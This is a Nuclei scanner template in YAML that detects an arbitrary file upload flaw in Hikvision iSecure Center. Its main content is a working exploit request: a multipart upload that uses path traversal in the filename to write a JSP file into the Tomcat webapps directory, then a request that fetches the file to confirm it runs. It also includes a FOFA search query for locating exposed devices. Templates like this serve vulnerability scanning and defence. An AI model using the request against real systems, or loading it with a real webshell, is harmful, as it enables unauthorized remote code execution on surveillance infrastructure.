nuclei-templates/http/vulnerabilities/hikvision/hikvision-js-files-upload.yaml

49 lines
1.8 KiB
YAML

id: hikvision-js-files-upload
info:
name: Hikvision iSecure Center - File Upload
author: Xc1Ym
severity: critical
description: |
THikvision iSecure Center /center/api/files;.js has an arbitrary file upload vulnerability
reference:
- https://zhuanlan.zhihu.com/p/639514473
- https://mp.weixin.qq.com/s/DR9xbwnrpg6YYSTw5pIAhw
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/hikvision-files-upload.yaml
metadata:
verified: true
max-request: 2
fofa-query: icon_hash="-808437027",app="HIKVISION-综合安防管理平台",title="综合安防管理平台"
tags: fileupload,iot,hikvision,intrusive
variables:
filename: '{{rand_base(6)}}'
payload: '{{rand_base(6)}}'
print: '<%out.print("{{payload}}");%>'
http:
- raw:
- |
POST /center/api/files;.js HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{{filename}}.jsp"
Content-Type:image/jpeg
{{print}}
------WebKitFormBoundarygcflwtei--
- |
GET /clusterMgr/{{filename}}.jsp;.js HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- 'contains(body_2, "{{payload}}")'
condition: and
# digest: 4a0a00473045022100b950d772245477a3b9ca9e272b20a63f38c6dc64378b6fa9dace29426cca5450022007f3af02a3422204244432721fbbdd6997a13cea83e2aac2259e960c7aefeb14:922c64590222798bb761d5b6d8e72950